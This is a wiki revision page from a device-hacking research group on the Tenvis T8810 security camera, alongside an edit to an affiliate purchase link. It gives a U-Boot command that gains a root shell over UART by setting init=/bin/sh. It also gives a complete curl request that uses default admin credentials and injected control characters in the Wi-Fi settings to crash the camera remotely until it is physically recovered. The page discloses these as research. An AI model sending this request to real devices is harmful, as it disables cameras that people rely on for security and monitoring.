Difference between revisions of "Tenvis T8810"

From Exploitee.rs
Jump to navigationJump to search
Line 9: Line 9:
== Purchase ==
== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/dp/B01MFBBYO8 Purchase the Tenvis T8810 at Amazon]
[https://www.amazon.com/Indoor-Security-Camera-Baby-Monitor/dp/B01MFBBYO8/ref=cm_cd_al_qh_dp_t?tag=exploiteers-20 Purchase the Tenvis T8810 at Amazon]


==Hardware Root==
==Hardware Root==

Revision as of 06:04, 9 August 2017

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

TENVIS T8110.JPG

Tenvis T8810

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Tenvis T8810 at Amazon

Hardware Root

The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh

setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm

Remote Denial of Service

WARNING

This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.

Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.

curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed​